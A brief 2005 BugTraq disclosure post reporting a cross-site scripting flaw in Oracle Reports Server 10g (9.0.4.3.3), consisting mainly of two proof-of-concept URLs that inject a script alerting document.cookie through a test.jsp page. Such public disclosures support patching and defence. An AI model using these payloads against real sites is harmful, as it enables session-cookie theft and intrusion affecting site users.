BugTraq
Oracle Reports Server 10g Vulnerable to XSS Mar 24 2005 02:23PM
Paolo Paolo (paolo paolo mail ee)


Oracle Reports Server 10g (9.0.4.3.3) Vulnerable to Cross Site Scripting

#####################

http://paolo/reports/examples/Tools/test.jsp?repprod&desname='<script
>alert(document.cookie);</script>

http://paolo/reports/examples/Tools/test.jsp?repprod"<script>alert
(document.cookie);</script>

#####################

Paolo sends GREETS to Oracle secalert

Paolo

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus